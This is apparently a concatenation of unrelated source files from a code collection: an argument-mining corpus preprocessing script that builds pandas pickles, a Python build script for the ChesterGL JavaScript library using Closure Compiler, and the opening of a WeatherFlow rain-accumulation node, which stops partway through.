                                relation_label = relation_type
                            # symmetric relation, link in both directions
                            elif relation_type in symmetric_link_types:
                                relation_label = relation_type
                                relation1to2 = True
                dataframe_row = {'text_ID': str(doc_ID),
                                 'rawtext': "",  # paragraphs[par],
                                 'source_proposition': propositions[sourceID],
                                 'source_ID': str(doc_ID) + "_" + str(sourceID),
                                 'target_proposition': propositions[targetID],
                                 'target_ID': str(doc_ID) + "_" + str(targetID),
                                 'source_type': type1,
                                 'target_type': type2,
                                 'relation_type': relation_label,
                                 'source_to_target': relation1to2,
                                 'set': split
                                 }
                row_list[split].append(dataframe_row)
                # FIX: count the label actually assigned to the pair; the old code counted the
                # loop variable, which after the loop always holds the last relation type
                if relation_label not in rel_count[split].keys():
                    rel_count[split][relation_label] = 0
                rel_count[split][relation_label] += 1
                if relation1to2 == True:
                    link_count[split] += 1
                if type1 not in prop_count[split].keys():
                    prop_count[split][type1] = 0
                prop_count[split][type1] += 1
    for split in ["test", "train", "validation"]:
        pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
        if not os.path.exists(pickles_path):
            os.makedirs(pickles_path)
        if len(row_list[split]) > 0:
            dataframe = pandas.DataFrame(row_list[split])
            dataframe = dataframe[['text_ID',
                                   'source_proposition',
                                   'source_ID',
                                   'target_proposition',
                                   'target_ID',
                                   'source_type',
                                   'target_type',
                                   'relation_type',
                                   'source_to_target',
                                   'set']]
            dataframe_path = os.path.join(pickles_path, split + ".pkl")
            dataframe.to_pickle(dataframe_path)
        print("_______________")
        print(split)
        print(prop_count[split])
        print(rel_count[split])
        print("links: " + str(link_count[split]))
        print("_______________")
def create_RCT_pickle(dataset_path, dataset_version, documents_path,
                      asymmetric_link_types, symmetric_link_types, reflexive):
    """
    Creates a pickle for each split of the specific version of the RCT dataset. IMPORTANT: if "PARTIAL-ATTACK" is not
    in the link list, they will be converted to "attack". MajorClaim will be converted to Claim.
    :param dataset_path: the working directory for the RCT dataset
    :param dataset_version: the name of the specific sub-dataset in exam
    :param documents_path: the path of the .ann and .txt file repository (regardless of the version)
    :param asymmetric_link_types: list of links that are asymmetric. For these, the "inv_..." non-links will be created
    :param symmetric_link_types: list of links that are symmetric. For these, 2 links rows will be created
    :param reflexive: whether reflexive links should be added
    :return: None
    """
    link_types = []
    link_types.extend(asymmetric_link_types)
    link_types.extend(symmetric_link_types)
    for split in ["train", "test", "validation"]:
        row_list = []
        rel_count = {}
        prop_count = {}
        link_count = 0
        # on disk the validation split is stored in a "_dev" folder
        splitname = split
        if split == "validation":
            splitname = "dev"
        split_documents_path = os.path.join(documents_path, "" + dataset_version + "_" + splitname)
        # if this split does not exists, skip to the next
        if not os.path.exists(split_documents_path):
            continue
        documents_names_list = os.listdir(split_documents_path)
        documents_paths_list = []
        for document_name in documents_names_list:
            documents_paths_list.append(os.path.join(split_documents_path, document_name))
        del documents_names_list
        print(str(len(documents_paths_list)) + " documents found for " + dataset_version + ", " + split)
        for document_path in documents_paths_list:
            # in case of subfolders, add their content to the document list
            # (appending while iterating is intentional: the loop reaches the new entries)
            if os.path.isdir(document_path):
                new_list = os.listdir(document_path)
                for name in new_list:
                    documents_paths_list.append(os.path.join(document_path, name))
                print("More documents: " + str(len(documents_paths_list)) + " documents found for "
                      + dataset_version + ", " + split)
                continue
            document_name = os.path.basename(document_path)
            if ".ann" not in document_name:
                continue
            # document ID, taken from the file name
            i = int(document_name.split(".")[0])
            # explicit encoding, consistent with the other corpus loaders
            labels_file = open(document_path, 'r', encoding="utf-8")
            labels_line = []
            for splits in labels_file.read().split('\n'):
                labels_line.append(splits)
            labels_file.close()
            data = {'prop_labels': {},
                    'prop_offsets': {},
                    'T_ids': [],
                    'propositions': {},
                    'start_offsets': {}
                    }
            for link_type in link_types:
                data[link_type] = []
            for line in labels_line:
                splits = line.split(maxsplit=4)
                if len(splits) <= 0:
                    continue
                # if it is a component label
                if splits[0][0] == 'T':
                    T_id = int(splits[0][1:]) - 1
                    data['T_ids'].append(T_id)
                    data['prop_labels'][T_id] = splits[1]
                    data['prop_offsets'][T_id] = [int(splits[2]), int(splits[3])]
                    # each starting offset is linked to a proposition ID
                    data['start_offsets'][int(splits[2])] = T_id
                    data['propositions'][T_id] = splits[4].split('\n')[0]
                # if it is a relation label
                elif splits[0][0] == 'R':
                    source = int(splits[2][6:]) - 1
                    target = int(splits[3][6:]) - 1
                    relation = splits[1].lower()
                    # to correct the ambiguity in the labelling
                    if relation == "supports":
                        relation = "support"
                    elif relation == "attacks":
                        relation = "attack"
                    # if the "partial-attack" category is not considered, they are treated as attacks
                    if relation == "partial-attack" and relation not in data.keys():
                        relation = "attack"
                    # ignore unrequested relation types (consistent with the other corpus loaders,
                    # which guard this append; previously an unknown type raised a KeyError)
                    if relation in data.keys():
                        data[relation].append([source, target])
            # in case annotations are not made following the temporal order
            # new order given by the starting offsets
            new_order = {}
            new_id = 0
            # find the match between the starting offsets and set the new id
            # for each initial offset, from lowest to highest
            for offset in sorted(data['start_offsets'].keys()):
                # find the corresponding ID
                old_id = data['start_offsets'][offset]
                # give it the lowest ID
                new_order[old_id] = new_id
                # increase the lowest ID to assign
                new_id += 1
            # adjust data to the new order
            new_data = {'prop_labels': [-1] * len(data['prop_labels']),
                        'prop_offsets': [-1] * len(data['prop_labels']),
                        'propositions': [-1] * len(data['prop_labels']), }
            for link_type in link_types:
                new_data[link_type] = []
            for link_type in link_types:
                for link in data[link_type]:
                    old_source = link[0]
                    old_target = link[1]
                    new_source = new_order[old_source]
                    new_target = new_order[old_target]
                    new_data[link_type].append([new_source, new_target])
            for old_id in data['T_ids']:
                new_id = new_order[old_id]
                new_data['prop_labels'][new_id] = data['prop_labels'][old_id]
                new_data['prop_offsets'][new_id] = data['prop_offsets'][old_id]
                new_data['propositions'][new_id] = data['propositions'][old_id]
            data = new_data
            # CREATE THE PROPER DATAFRAME
            propositions = data['propositions']
            num_propositions = len(propositions)
            assert (num_propositions >= 1)
            for sourceID in range(num_propositions):
                type1 = data['prop_labels'][sourceID]
                if type1 == "MajorClaim":
                    type1 = "Claim"
                for targetID in range(num_propositions):
                    # proposition type
                    type2 = data['prop_labels'][targetID]
                    if type2 == "MajorClaim":
                        type2 = "Claim"
                    # skip reflexive relations if they are present
                    if sourceID == targetID and not reflexive:
                        continue
                    relation_type = None
                    relation1to2 = False
                    # relation type
                    for link_type in link_types:
                        links = data[link_type]
                        for link in links:
                            if link[0] == sourceID and link[1] == targetID:
                                if relation_type is not None and not relation_type == link_type:
                                    raise Exception('MORE DIFFERENT RELATIONS FOR THE SAME COUPLE OF PROPOSITIONS:'
                                                    + documents_path)
                                relation_type = link_type
                                relation1to2 = True
                            # create the symmetric or the asymmetric (inverse) relation
                            elif link[0] == targetID and link[1] == sourceID:
                                if link_type in asymmetric_link_types:
                                    relation_type = "inv_" + link_type
                                elif link_type in symmetric_link_types:
                                    relation_type = link_type
                                    relation1to2 = True
                    dataframe_row = {'text_ID': str(i),
                                     'source_proposition': propositions[sourceID],
                                     'source_ID': str(i) + "_" + str(sourceID),
                                     'target_proposition': propositions[targetID],
                                     'target_ID': str(i) + "_" + str(targetID),
                                     'source_type': type1,
                                     'target_type': type2,
                                     'relation_type': relation_type,
                                     'source_to_target': relation1to2,
                                     'set': split
                                     }
                    row_list.append(dataframe_row)
                    if relation_type not in rel_count.keys():
                        rel_count[relation_type] = 0
                    rel_count[relation_type] += 1
                    if relation1to2 == True:
                        link_count += 1
                    if type1 not in prop_count.keys():
                        prop_count[type1] = 0
                    prop_count[type1] += 1
        pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
        if not os.path.exists(pickles_path):
            os.makedirs(pickles_path)
        if len(row_list) > 0:
            dataframe = pandas.DataFrame(row_list)
            dataframe = dataframe[['text_ID',
                                   'source_proposition',
                                   'source_ID',
                                   'target_proposition',
                                   'target_ID',
                                   'source_type',
                                   'target_type',
                                   'relation_type',
                                   'source_to_target',
                                   'set']]
            dataframe_path = os.path.join(pickles_path, split + ".pkl")
            dataframe.to_pickle(dataframe_path)
        print("_______________")
        print(split)
        print(prop_count)
        print(rel_count)
        print("links: " + str(link_count))
        print("_______________")
def print_dataframe_details(dataframe_path):
    """Load a pickled relations dataframe and print summary statistics about it:
    row count, value counts of the link/relation columns, numbers of distinct
    texts and source propositions, and the source-type distribution."""
    df = pandas.read_pickle(dataframe_path)
    print()
    print('total relations')
    print(len(df))
    print()
    # distribution of the link direction flag and of the relation labels
    for column in ('source_to_target', 'relation_type'):
        print(df[column].value_counts())
        print()
    # number of distinct texts and of distinct source propositions
    for column in ('text_ID', 'source_ID'):
        print(column)
        print(len(df[column].drop_duplicates()))
        print()
    # type distribution over the unique source propositions
    unique_sources = df[['source_ID', 'source_type']].drop_duplicates()
    print(len(unique_sources))
    print(unique_sources['source_type'].value_counts())
def create_total_dataframe(pickles_path):
    """
    Given a path with train, test, and/or validation dataframes, merge them together in a total dataframe
    :param pickles_path:
    :return:
    """
    # collect whichever split pickles exist, in train/test/validation order
    partial_frames = []
    for split_name in ("train", "test", "validation"):
        split_pickle = os.path.join(pickles_path, split_name + ".pkl")
        if os.path.exists(split_pickle):
            partial_frames.append(pandas.read_pickle(split_pickle))
    if partial_frames:
        total = pandas.concat(partial_frames).sort_values('source_ID')
        total.to_pickle(os.path.join(pickles_path, 'total.pkl'))
def create_collective_version_dataframe(pickle_path, split):
    """
    Given a path containing a set of "dataset version" folders, with dataframes, merge together all the ones from the
    same split
    :param pickle_path:
    :param split: One between "train", "test", "validation", or "total"
    :return:
    """
    collected = []
    for entry in os.listdir(pickle_path):
        version_dir = os.path.join(pickle_path, entry)
        if not os.path.isdir(version_dir):
            continue
        # pick up this version's dataframe for the requested split, if present
        candidate = os.path.join(version_dir, split + ".pkl")
        if os.path.exists(candidate):
            collected.append(pandas.read_pickle(candidate))
    if collected:
        merged = pandas.concat(collected).sort_values('source_ID')
        merged.to_pickle(os.path.join(pickle_path, split + ".pkl"))
def print_distance_analysis(pickles_path):
    """For each existing split pickle, print a table with the number of links and
    non-links at each argumentative distance (source index minus target index,
    taken from the trailing component of the IDs)."""
    for split_name in ('total', 'train', 'test', 'validation'):
        print(split_name)
        frame_path = os.path.join(pickles_path, split_name + '.pkl')
        if not os.path.exists(frame_path):
            continue
        frame = pandas.read_pickle(frame_path)
        link_distances = {}
        non_link_distances = {}
        max_delta = 0
        min_delta = 0
        for _, row in frame.iterrows():
            # argumentative distance = difference of the trailing ID components
            delta = (int(row['source_ID'].split('_')[-1])
                     - int(row['target_ID'].split('_')[-1]))
            max_delta = max(max_delta, delta)
            min_delta = min(min_delta, delta)
            bucket = link_distances if row['source_to_target'] else non_link_distances
            bucket[delta] = bucket.get(delta, 0) + 1
        print()
        print()
        print(split_name)
        print("distance\tnot links\tlinks")
        for delta in range(min_delta, max_delta + 1):
            print(str(delta) + "\t" + str(non_link_distances.get(delta, 0))
                  + '\t' + str(link_distances.get(delta, 0)))
        sys.stdout.flush()
def routine_RCT_corpus():
    """
    Creates pickles for the RCT corpus. For each dataset version ("neo", "glaucoma",
    "mixed"), creates a specific pickle file. It creates also a collective pickle file
    with all the previous versions mixed together, prints per-split details, and runs
    the distance analysis.
    :return: None
    """
    a_link_types = ['support', 'attack']
    s_link_types = []
    dataset_name = "RCT"
    dataset_versions = ["neo", "glaucoma", "mixed"]
    splits = ['total', 'train', 'test', 'validation']
    dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
    document_path = os.path.join(os.getcwd(), 'Datasets', dataset_name, "original_data")
    print("-------------------------------------------------------------")
    print("DATASETS CREATION")
    print("-------------------------------------------------------------")
    for dataset_version in dataset_versions:
        print("DATASET VERSION: " + dataset_version)
        print()
        create_RCT_pickle(dataset_path, dataset_version, document_path, a_link_types, s_link_types, False)
        print('____________________________________________________________________________________________')
        # merge this version's splits into a "total" dataframe
        pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
        create_total_dataframe(pickles_path)
        print('____________________________________________________________________________________________')
    # merge the same split across all the versions
    for split in splits:
        pickle_path = os.path.join(dataset_path, "pickles")
        create_collective_version_dataframe(pickle_path, split)
    print("-------------------------------------------------------------")
    print("DATASETS DETAILS")
    print("-------------------------------------------------------------")
    pickles_path = os.path.join(dataset_path, "pickles")
    print("DATASET VERSION: " + "all")
    print()
    for split in splits:
        print('_______________________')
        print(split)
        dataframe_path = os.path.join(pickles_path, split + '.pkl')
        if os.path.exists(dataframe_path):
            print_dataframe_details(dataframe_path)
            print('_______________________')
            sys.stdout.flush()
        print('_______________________')
    print('_______________________')
    print('_____________________________________________________________________')
    for dataset_version in dataset_versions:
        pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
        print("DATASET VERSION: " + dataset_version)
        print()
        for split in splits:
            print('_______________________')
            print(split)
            dataframe_path = os.path.join(pickles_path, split + '.pkl')
            if os.path.exists(dataframe_path):
                print_dataframe_details(dataframe_path)
                print('_______________________')
                sys.stdout.flush()
            print('_______________________')
        print('_______________________')
        print('_____________________________________________________________________')
    print("-------------------------------------------------------------")
    print("DISTANCE ANALYSIS")
    print("-------------------------------------------------------------")
    pickles_path = os.path.join(dataset_path, "pickles")
    print_distance_analysis(pickles_path)
    for dataset_version in dataset_versions:
        # distance analysis
        pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
        print_distance_analysis(pickles_path)
def routine_DrInventor_corpus(maxdistance=0):
    """Build, summarize, and analyze the Dr. Inventor corpus.

    Creates the pickled splits for dataset version ``'arg<maxdistance>'``,
    prints per-split dataframe details, and runs the pairwise distance
    analysis.

    Args:
        maxdistance: maximum component distance considered when creating
            pairs (0 means unlimited); it is also embedded in the dataset
            version name.
    """
    # DR INVENTOR CORPUS
    a_link_types = ['supports', 'contradicts']
    s_link_types = ['semantically_same']
    s_non_link_types = ['parts_of_same']
    dataset_name = 'DrInventor'
    dataset_version = 'arg' + str(maxdistance)
    splits = ['total', 'train', 'test', 'validation']
    dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
    document_path = os.path.join(os.getcwd(), 'Datasets', dataset_name, "original_data")
    print("-------------------------------------------------------------")
    print("DATASETS CREATION")
    print("-------------------------------------------------------------")
    create_inv_pickle(dataset_path, dataset_version, document_path, a_link_types, s_link_types, s_non_link_types,
                      maxdistance=maxdistance, reflexive=False)
    print('____________________________________________________________________________________________')
    pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
    sys.stdout.flush()
    create_total_dataframe(pickles_path)
    print('____________________________________________________________________________________________')
    print("-------------------------------------------------------------")
    print("DATASETS DETAILS")
    print("-------------------------------------------------------------")
    # NOTE(review): unlike the RCT routine, this "all" report reads from the
    # version-specific pickles directory rather than the shared one -- confirm
    # this is intended.
    pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
    print("DATASET VERSION: " + "all")
    print()
    for split in splits:
        print('_______________________')
        print(split)
        dataframe_path = os.path.join(pickles_path, split + '.pkl')
        if os.path.exists(dataframe_path):
            print_dataframe_details(dataframe_path)
            print('_______________________')
        sys.stdout.flush()
    print('_______________________')
    print('_______________________')
    print('_____________________________________________________________________')
    pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
    print("DATASET VERSION: " + dataset_version)
    print()
    for split in splits:
        print('_______________________')
        print(split)
        dataframe_path = os.path.join(pickles_path, split + '.pkl')
        if os.path.exists(dataframe_path):
            print_dataframe_details(dataframe_path)
            print('_______________________')
        sys.stdout.flush()
    print('_______________________')
    print('_______________________')
    print('_____________________________________________________________________')
    print("-------------------------------------------------------------")
    print("DISTANCE ANALYSIS")
    print("-------------------------------------------------------------")
    pickles_path = os.path.join(dataset_path, "pickles")
    print_distance_analysis(pickles_path)
    # distance analysis for the version-specific pickles
    pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
    print_distance_analysis(pickles_path)
    # Fixed: removed dead trailing locals (highest = 0 / lowest = 0) that were
    # assigned but never read.
def routine_ECHR_corpus():
    """Build, summarize, and analyze the ECHR2018 corpus.

    Creates the pickled splits for dataset version 'arg0' (no distance
    limit), prints per-split dataframe details, and runs the pairwise
    distance analysis.
    """
    a_link_types = ['Support', 'Attack']
    s_link_types = []
    s_non_link_types = ['Duplicate']
    a_non_link_types = ['Citation']
    dataset_name = 'ECHR2018'
    maxdistance = 0
    dataset_version = 'arg' + str(maxdistance)
    splits = ['total', 'train', 'test', 'validation']
    dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
    document_path = os.path.join(os.getcwd(), 'Datasets', dataset_name, "original_data")
    print("-------------------------------------------------------------")
    print("DATASETS CREATION")
    print("-------------------------------------------------------------")
    create_ECHR_pickle(dataset_path, dataset_version, document_path,
                       a_link_types, s_link_types, a_non_link_types, s_non_link_types,
                       maxdistance=maxdistance, reflexive=False)
    print('____________________________________________________________________________________________')
    pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
    sys.stdout.flush()
    create_total_dataframe(pickles_path)
    print('____________________________________________________________________________________________')
    print("-------------------------------------------------------------")
    print("DATASETS DETAILS")
    print("-------------------------------------------------------------")
    # NOTE(review): as in routine_DrInventor_corpus, the "all" report reads
    # from the version-specific pickles directory -- confirm this is intended.
    pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
    print("DATASET VERSION: " + "all")
    print()
    for split in splits:
        print('_______________________')
        print(split)
        dataframe_path = os.path.join(pickles_path, split + '.pkl')
        if os.path.exists(dataframe_path):
            print_dataframe_details(dataframe_path)
            print('_______________________')
        sys.stdout.flush()
    print('_______________________')
    print('_______________________')
    print('_____________________________________________________________________')
    pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
    print("DATASET VERSION: " + dataset_version)
    print()
    for split in splits:
        print('_______________________')
        print(split)
        dataframe_path = os.path.join(pickles_path, split + '.pkl')
        if os.path.exists(dataframe_path):
            print_dataframe_details(dataframe_path)
            print('_______________________')
        sys.stdout.flush()
    print('_______________________')
    print('_______________________')
    print('_____________________________________________________________________')
    print("-------------------------------------------------------------")
    print("DISTANCE ANALYSIS")
    print("-------------------------------------------------------------")
    pickles_path = os.path.join(dataset_path, "pickles")
    print_distance_analysis(pickles_path)
    # distance analysis for the version-specific pickles
    pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
    print_distance_analysis(pickles_path)
    # Fixed: removed dead trailing locals (highest = 0 / lowest = 0) that were
    # assigned but never read.
# NOTE: routine_CDCP_corpus below was recently modified and has not yet been re-tested.
def routine_CDCP_corpus():
    """Build the CDCP corpus pickles and print per-split dataframe details."""
    # CDCP CORPUS
    link_types = ['evidences', 'reasons']
    dataset_name = 'cdcp_ACL17'
    dataset_version = 'new_3'
    dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
    # Create the train pickle (with a 10% validation carve-out), then the test pickle.
    create_preprocessed_cdcp_pickle(dataset_path, dataset_version, link_types, 'train',
                                    validation=0.1, reflexive=False)
    create_preprocessed_cdcp_pickle(dataset_path, dataset_version, link_types, 'test',
                                    reflexive=False)
    pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
    create_total_dataframe(pickles_path)
    # Report details for every split.
    for split_name in ('train', 'test', 'validation', 'total'):
        print(split_name)
        print_dataframe_details(os.path.join(pickles_path, split_name + '.pkl'))
        print('_______________________')
        print('_______________________')
def routine_UKP_corpus():
    """Build the AAEC_v2 (UKP) corpus pickles and print per-split details."""
    link_types = ['supports', 'attacks']
    dataset_name = 'AAEC_v2'
    dataset_version = 'new_2R'
    dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
    # Use of reflexive creates 8k additional pairs of no-link :(
    # Avoidance of reflexive misses 400 major claims :(
    create_ukp_pickle(dataset_path, dataset_version, link_types, 'train',
                      validation=0.1, reflexive=True)
    create_ukp_pickle(dataset_path, dataset_version, link_types, 'test',
                      validation=0, reflexive=True)
    pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
    create_total_dataframe(pickles_path)
    # Report details for every split.
    for split_name in ('train', 'test', 'validation', 'total'):
        print(split_name)
        print_dataframe_details(os.path.join(pickles_path, split_name + '.pkl'))
        print('_______________________')
        print('_______________________')
def routine_scidtb_corpus():
    """Build the SciDTB argumentation corpus pickles and print split details."""
    link_types = ["support", "attack"]
    asymmetric_non_link_types = []
    # asymmetric_non_link_types = ["detail", "additional", "sequence"]
    dataset_name = "scidtb_argmin_annotations"
    dataset_version = "only_arg_v1"
    base_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
    document_path = os.path.join(base_path, "original_data")
    pickles_path = os.path.join(base_path, 'pickles', dataset_version)
    create_scidtb_pickle(base_path, dataset_version, document_path, link_types, [], asymmetric_non_link_types, [],
                         test=0.2, validation=0.2, reflexive=False)
    create_total_dataframe(pickles_path)
    # Report details for every split.
    for split_name in ('train', 'test', 'validation', 'total'):
        print(split_name)
        print_dataframe_details(os.path.join(pickles_path, split_name + '.pkl'))
        print('_______________________')
        print('_______________________')
if __name__ == '__main__':
    # Command-line entry point: pick the corpus routine to run.
    parser = argparse.ArgumentParser(description="Create a new dataframe")
    parser.add_argument('-c', '--corpus',
                        choices=["rct", "drinv", "cdcp", "echr", "ukp", "scidtb"],
                        help="Corpus", default="cdcp")
    # Fixed: parse the distance as an int; previously a CLI-supplied value
    # arrived as a string (only the default 10 was an int).
    parser.add_argument('-d', '--distance', type=int,
                        help="The maximum distance considered to create pairs. Used only for some corpora.", default=10)
    args = parser.parse_args()
    corpus = args.corpus
    distance = args.distance
    if corpus.lower() == "rct":
        routine_RCT_corpus()
    elif corpus.lower() == "cdcp":
        routine_CDCP_corpus()
    elif corpus.lower() == "drinv":
        routine_DrInventor_corpus(distance)
    elif corpus.lower() == "echr":
        # Fixed: "echr" was an accepted choice but previously fell through to
        # the unsupported branch, so routine_ECHR_corpus was unreachable.
        routine_ECHR_corpus()
    elif corpus.lower() == "ukp":
        routine_UKP_corpus()
    elif corpus.lower() == "scidtb":
        routine_scidtb_corpus()
    else:
        print("Dataset not yet supported")
| 3.140625 | 3 |
benchmarks/src/garage_benchmarks/experiments/q_functions/__init__.py | blacksph3re/garage | 1,500 | 12765054 | <reponame>blacksph3re/garage
"""Benchmarking experiments for Q-functions."""
from garage_benchmarks.experiments.q_functions.continuous_mlp_q_function import ( # isort:skip # noqa: E501
continuous_mlp_q_function)
__all__ = ['continuous_mlp_q_function']
| 1.015625 | 1 |
compile.py | rolandoam/ChesterGL | 1 | 12765055 | # compile.py
# - Version: 1.0
# - Replacement for the Makefile. This is cross-platform.
# - Requires Python 2.7+
import sys, argparse, subprocess, urllib2
# Closure extern files downloaded for the compiler's type checks.
externs = ['jquery-1.7.js', 'webkit_console.js', 'google_analytics_api.js', 'json.js']
# ChesterGL sources, listed in dependency order.
src = ['chesterGL/core.js', 'chesterGL/block.js', 'chesterGL/blockFrames.js', 'chesterGL/blockGroup.js', 'chesterGL/actions.js', 'chesterGL/tmxBlock.js', 'chesterGL/GPUParticleSystem.js', 'chesterGL/primitivesBlock.js', 'chesterGL/labelBlock.js', 'chesterGL/bmFontLabelBlock.js']
parser = argparse.ArgumentParser(description='Compiler for ChesterGL')
group1 = parser.add_argument_group('Compile Options')
group1.add_argument('-mode', action='store', choices=['debug', 'release'], default='release', help='Set the flags for debug or release.')
# NOTE(review): action='store_true' with default=True means externs are always
# fetched and the -f flag can never disable it -- confirm intent.
group1.add_argument('-fetch', '-f', action='store_true', default=True, help='Fetch externs.')
group1.add_argument('-docs', action='store_true', help='Build documents using JSDoc.')
group1.add_argument('-output', '-o', action='store', default='./html', help='Output directory.')
group2 = parser.add_argument_group('Dependency Options')
group2.add_argument('-python', action='store', default='python', help='Location of python executable.')
group2.add_argument('-java', action='store', default='java', help='Location of java.')
group2.add_argument('-jsdoc', action='store', default='/Applications/jsdoc-toolkit', help='Location of JSDoc root directory.')
group2.add_argument('-ccompiler', action='store', default='/Applications/closure-compiler', help='Path to closure compiler folder.')
group2.add_argument('-clib', action='store', default='/Applications/closure-library', help='Path to closure library folder.')
group2.add_argument('-cjar', action='store', default='compiler.jar', help='Filename to closure compiler jar.')
args = parser.parse_args()
# Build the --externs flag string once; it is reused in both flag files.
externsTmp = ''
for ext in externs:
	externsTmp += '--externs ' + args.ccompiler +'/' + ext + ' '
compilerArgs = externsTmp + '--language_in=ECMASCRIPT5_STRICT --warning_level=VERBOSE --jscomp_warning=checkTypes --summary_detail_level=3 '
def dload(file, output):
	"""Download *file* (a URL) and write the response body to *output*.

	Fixed: the HTTP response is now closed even when read() raises, and the
	output file is managed with a context manager, instead of leaking both
	descriptors on error.
	"""
	response = urllib2.urlopen(file)
	try:
		html = response.read()
	finally:
		response.close()
	with open(output, 'w+') as o:
		o.write(html)
# Fetch externs?
if args.fetch:
	for file in externs:
		dload('http://closure-compiler.googlecode.com/svn/trunk/contrib/externs/' + file, args.ccompiler + '/' + file)
		print 'Downloaded: ' + file
# Write the flag files for compiling
flags = ''
flagFile = open(args.mode + '.flags', 'w+')
if args.mode == 'release': # Release flags
	flags += compilerArgs
	flags += '--externs deps.js '
	flags += '--compilation_level ADVANCED_OPTIMIZATIONS '
	flags += '--create_source_map=' + args.output +'/chester.js.map '
else: # Debug flags
	flags += compilerArgs
	flags += '--externs deps.js '
	flags += '--compilation_level ADVANCED_OPTIMIZATIONS '
	flags += '--formatting PRETTY_PRINT '
	flags += '-D ENABLE_DEBUG=1 '
	flags += '--create_source_map=' + args.output +'/chester.js.map '
	flags += '--source_map_format=V3'
flagFile.write(flags)
flagFile.close()
# Compile: invoke closurebuilder.py with the compiler jar and all sources.
# NOTE(review): the command is a single string run with shell=True, so paths
# containing spaces or shell metacharacters will break or be interpreted by
# the shell -- consider an argument list with shell=False.
compileArgs = args.python + ' '
compileArgs += args.clib + '/closure/bin/build/closurebuilder.py '
compileArgs += '--root ' + args.clib + ' '
compileArgs += '--output_mode=compiled '
compileArgs += '--output_file=' + args.output + '/chester.js '
compileArgs += '--compiler_jar=' + args.ccompiler + '/' + args.cjar + ' '
compileArgs += '--root=chesterGL/ '
if args.mode == 'release':
	compileArgs += '--compiler_flags="--flagfile=release.flags" '
else:
	compileArgs += '--compiler_flags="--flagfile=debug.flags" '
for file in src:
	compileArgs += '-i ' + file + ' '
if subprocess.call(compileArgs, shell=True) != 0:
	print '================================'
	print 'We had an error during the compile process.'
	sys.exit()
# If debug, add source mapping comment to compiled file.
if args.mode == 'debug':
	jsFile = open(args.output + '/chester.js', 'a+')
	jsFile.write('//@ sourceMappingURL=chester.js.map');
	jsFile.close()
# Generate doc?
if args.docs:
	docs = args.java + ' '
	docs += '-jar ' + args.jsdoc + '/jsrun.jar ' + args.jsdoc + '/app/run.js -w -version 170 -v -a '
	docs += '-t=' + args.jsdoc + '/templates/jsdoc '
	src.insert(0, 'chesterGL/docs.js')
	for file in src:
		docs += file + ' '
	docs += '-d=' + args.output + '/docs'
	if subprocess.call(docs, shell=True) != 0:
		print '================================'
		print 'We had an error during the compile process.'
		sys.exit()
print '================================'
print 'Completed.'
nodes/rain.py | JavierRefuerzo/WeatherFlow | 4 | 12765056 | #!/usr/bin/env python3
"""
Polyglot v2 node server for WeatherFlow Weather Station data.
Copyright (c) 2018,2019 <NAME>
"""
import polyinterface
import sys
import time
import datetime
import urllib3
import json
import socket
import math
import threading
LOGGER = polyinterface.LOGGER
class PrecipitationNode(polyinterface.Node):
    """ISY node tracking the current rain rate and accumulated rainfall.

    Accumulations are kept per hour / day / week / month / year and are
    rolled over automatically whenever the corresponding calendar period
    changes (the finished daily total is preserved as "yesterday").
    Internal totals are kept in mm; SetUnits() switches the driver UOMs
    and the value conversion done in setDriver() between mm and inches.
    """
    id = 'precipitation'
    hint = [1,11,5,0]
    units = 'metric'
    # Driver table: ST = current rate, GV0..GV4 = hourly/daily/weekly/
    # monthly/yearly accumulation, GV5 = yesterday's total.  The UOMs are
    # rewritten by SetUnits() when inches are selected.
    drivers = [
        {'driver': 'ST', 'value': 0, 'uom': 46},  # rate
        {'driver': 'GV0', 'value': 0, 'uom': 82}, # hourly
        {'driver': 'GV1', 'value': 0, 'uom': 82}, # daily
        {'driver': 'GV2', 'value': 0, 'uom': 82}, # weekly
        {'driver': 'GV3', 'value': 0, 'uom': 82}, # monthly
        {'driver': 'GV4', 'value': 0, 'uom': 82}, # yearly
        {'driver': 'GV5', 'value': 0, 'uom': 82}  # yesterday
        ]
    # Running accumulation state (mm) and the calendar markers of the
    # period each total belongs to.  NOTE(review): these are class
    # attributes, so they would be shared if more than one instance were
    # created -- presumably a single precipitation node exists.
    hourly_rain = 0
    daily_rain = 0
    weekly_rain = 0
    monthly_rain = 0
    yearly_rain = 0
    yesterday_rain = 0
    prev_hour = 0
    prev_day = 0
    prev_week = 0
    prev_month = 0
    prev_year = 0

    def InitializeRain(self, acc):
        """Restore persisted accumulation state and discard stale periods.

        *acc* is a dict holding the previously saved totals ('hourly',
        'daily', 'weekly', 'monthly', 'yearly', 'yesterday') plus the
        calendar markers ('hour', 'day', 'week', 'month', 'year') they
        were saved under.  Any total whose period has since ended is
        reset; a finished daily total rolls into yesterday_rain first.
        """
        self.daily_rain = acc['daily']
        self.hourly_rain = acc['hourly']
        self.weekly_rain = acc['weekly']
        self.monthly_rain = acc['monthly']
        self.yearly_rain = acc['yearly']
        self.yesterday_rain = acc['yesterday']
        self.prev_hour = acc['hour']
        self.prev_day = acc['day']
        self.prev_week = acc['week']
        self.prev_month = acc['month']
        self.prev_year = acc['year']
        now = datetime.datetime.now()
        # Compare the saved period markers with the current date and clear
        # out any accumulations that belong to a finished period.
        # (Fixed: removed a dead "current_hour = now.hour" assignment.)
        if self.prev_hour != now.hour:
            LOGGER.info('Clearing old hourly data')
            self.prev_hour = now.hour
            self.hourly_rain = 0
        if self.prev_day != now.day:
            LOGGER.info('Clearing old daily, hourly data')
            self.yesterday_rain = self.daily_rain
